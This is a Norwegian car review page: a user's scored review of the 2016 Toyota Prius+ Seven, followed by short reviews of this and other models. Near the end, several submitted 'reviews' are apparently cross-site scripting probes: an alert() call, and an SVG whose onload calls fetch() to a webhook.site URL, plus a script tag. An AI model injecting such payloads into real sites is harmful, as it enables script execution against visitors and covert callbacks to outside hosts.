Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2016 Toyota Prius+ Seven 1,8 VVT-i Hybrid Executive Skyview Stasjonsvogn Bensin/Batteri

Score 7/10

Er du en familie med tre barn, vil ha en økonomisk og driftssikker bil, da er denne ett veldig godt alternativ. Bortsett fra taxisjåfører ser jeg ikke helt hvorfor noen andre skulle gå for denne. Den er ikke særlig pen å se på. Det ser ut som en prius som har fått en kasse sveiset på baken, noe som vell er akkurat det som har skjedd. <br /> <br /> Når det kommer gode el-bil alternativ for familier med samme behov så må jo denne bli overflødig ganske kjapt. Men frem til dess er den en fin bil å ha.

Kjøreglede

6 / 10
Den driver frem. Lett og kjøre, takler det meste. Men litt kjedelig. Den er jo det. En person som kjører bil fordi man må, komme seg fra a til B er det som betyr noe. De hadde sikkert satt kjøreglede på 10. men en som liker å kjøre bil vil da altså oppleve den som litt tung og kjedelig og tidvis litt bråkete. Altså, kjøp heller en rav eller chr om dette er viktig.

Kvalitet/driftssikkerhet

7 / 10
Dette er grunnen til at du kjøper Toyota. Men vær obs på at bremser kan ruste. Og jeg har selv opplevd rust under bil etter bare 5 år. Men det siste er en subjektiv opplevelse, bremser derimot er objektivt et vanlig rustproblem på bilen. Ellers er interiør økonomisk heller enn høy kvalitet, ikke forvent BMW liksom.

Plass/praktiske løsninger

7 / 10
Den har 3 separate bakseter og plass til tre barneseter (2 isofix) men er ikke like romslig som feks Ford s-max. Du må krongle litt med tre barneseter, ikke forvent at det er helt uten utfordringer. Mye bagasjeplass. Bakseteplass er god altså, og er vell en av grunnene til at dette er en populær taxibil.

De to setene i tredje seterad kan bare brukes av barn, små voksne på korte turer. Kanskje mer riktig å se på bilen som en litt stor stasjonsvogn heller enn mpv?

Økonomi/kostnader

8 / 10
Veldig bra. Bruker lite bensin og har lavere service kostnader enn biler uten noe form for eldrift. Hybridbatreriet gjør mye av jobben som gjøres av forskjellige andre bestanddeler i andre biler. Batteriet har potensielt 10 års garanti. Men sammenlignet med elbil, som man må nå til dags, så er det vell ikke i nærheten.

Drivstoff/forbruk

7 / 10
Forvent i overkant av 0,5 liter per mil ved blandet kjøring. Om du kjører mye i by er den veldig økonomisk. Det er enda en grunn til at det er en populær taxibil. Du kan ikke (bare sjelden) tvinge bilen til å kjøre el.

Flere vurderinger fra samme modell

Toyota Prius+ Seven (2019)

Teknisk er denne og alle biler fra Toyota meget bra. Men jeg er svært skuffet over ingen antirustbehandling.

Score 7.6

Vurdert av Johannes

Toyota Prius+ Seven (2017)

Man må venne seg til å kjøre en Prius, trivelig i byen med Hybrid, lav forbruk.

Score 9.6

Vurdert av PriusLus

Toyota Prius+ Seven (2016)

Lavt drivstofforbruk og god plass. Altfor dyre service kostnader og korte service intervaller. Så langt unna sportsbil det er mulig og komme.

Score 6.2

Vurdert av CV33

Toyota Prius+ Seven (2016)

Min tredje Prius sier kanskje alt.

Score 8.2

Vurdert av Karlson

Toyota Prius+ Seven (2015)

Ekstremt driftssikker bil. Etter 7 år / 90000 km har jeg ennå ikke opplevd et eneste problem annet en bytte av slitedeler. Veldig praktisk, med stor innvendig plass i forhold til størrelsen. Relati

Score 9.0

Vurdert av Fofrant

Toyota Prius+ Seven (2015)

veldig fornøyd og kanskje også veldig heldig med kjøp av brukt taxi, feilfri i tre år. service årlig er nok smart på en så langtkjørt bil. bilen er jo relativt kjedelig, men desto smartere om

Score 9.0

Vurdert av knut

Toyota Prius+ Seven (2015)

Anbefaler alle som vil ha en driftsikker bil med lite tull å hvertfall se på den bilen. Har du små barn så får du plass til alt du trenger. Jeg kommer neppe til å velge noe annet enn Toyota

Score 9.2

Vurdert av HC91

Toyota Prius+ Seven (2015)

+ Basert på 4 års eierskap. 6 år gammel i 2021. 178000 km. Finnes rimelige deler. Mer slitesterk enn antatt. Ingen tekniske feil! En rimelig bil under 200k som er teknisk driftssikker som en til 50

Score 8.8

Vurdert av Nasirdi

Toyota Prius+ Seven (2015)

fantastisk økonomisk bil med blir noe kjedelig

Score 9.8

Vurdert av Rolf

Toyota Prius+ Seven (2015)

Problemfri foreløpig, snart 1 års eieskap. God plass, gode seter, greit utseende til toyota å være, lavt forbruk, støyer lite bortsett fra cvt-kassa ved gasspådrag,ikke noe rakett ei heller en s

Score 8.2

Vurdert av Oslo

Toyota Prius+ Seven (2015)

Trinnløs automat kasse bråker mye i bratte bakkar - dårlig støyisolert! Parkerte bilen ved siden av en ny Passat og oppdaget at den "lille" Prius + (Seven) er større enn Passaten.

Score 7.6

Vurdert av Jeppe

Toyota Prius+ Seven (2013)

Får ikke plass til tre Isofix seter bak i bilen. En stor nedtur. Dårlig plass i bagasjerommet også. En klassisk Toyota.

Score 6.2

Vurdert av Priusmannen

Toyota Prius+ Seven (2013)

Kort og godt kjempefornøyd med en veldig god bil.

Score 9.4

Vurdert av Toyotafan

Toyota Prius+ Seven (2013)

Ville ha en driftsikker og økonomisk familiebil, og dét fikk vi, LITT flaut at det er blitt taxibil nummro uno... Kjøper kanskje ikke prius neste gang, men gjerne Toyota!

Score 8.2

Vurdert av Enga-Ray

Toyota Prius+ Seven (2012)

En solid bil. Vi er en familie på seks, og med takboks og bagasjeboks på hengerkulen går det fint også på langtur.

Score 8.2

Vurdert av André H

Flere vurderinger

Mitsubishi Outlander PHEV (2016)

En bil som har vært brukt til store og små transporter. Meget pålitelig sommer som vinter. Vil beholde bilen i mange år.

Score 8.2

Vurdert av Svein13

Citroën DS3 (2012)

Billog liten sportsbil. Jeg vil tro at dette må være en veldig gøy førstebil for mange. Den går godt om mann får bensin 156hk utgaven den ser bra ut og den ligger godt på veien.

Score 6.8

Vurdert av Kimmi500

Volvo XC40 (2024)

Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!

Score 9.6

Vurdert av HGB68

Skoda Enyaq (2025)

Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste

Score 6.6

Vurdert av uKultuR

Volvo EX30 (2025)

Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des

Score 2.4

Vurdert av Slurp

Skoda Enyaq (2023)

Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi

Score 6.8

Vurdert av Dincer

Mazda CX-5 (2013)

Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve

Score 7.0

Vurdert av Olav

Renault 5 E-Tech (2025)

Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te

Score 8.4

Vurdert av Knut

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt